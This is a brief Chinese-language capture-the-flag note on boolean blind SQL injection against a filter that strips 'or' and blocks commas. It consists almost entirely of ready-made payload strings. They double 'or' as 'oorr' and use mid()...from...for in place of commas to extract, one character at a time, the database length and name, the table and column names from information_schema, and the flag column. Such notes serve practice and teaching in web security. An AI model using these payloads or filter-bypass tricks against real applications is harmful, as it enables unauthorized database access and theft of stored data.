0x01 替換了or、不能使用,、盲注
數據庫長度
"0'oorr((length(database()))=%s)oorr'0" % (x)
數據庫名
"0'oorr((mid((database())from(%s)foorr(1)))='%s')oorr'0" % (x+1, y)
表名
"0'oorr((select(mid(group_concat(table_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.tables)where(table_schema)='ctf_sql_bool_blind')='%s')oorr'0" % (x+1, y)
列名
"0'oorr((select(mid(group_concat(column_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.columns)where(table_name)='fiag')='%s')oorr'0" % (x+1, y)
dump
"0'oorr((select(mid((fl$4g)from(%s)foorr(1)))from(fiag))='%s')oorr'0" % (x+1, y)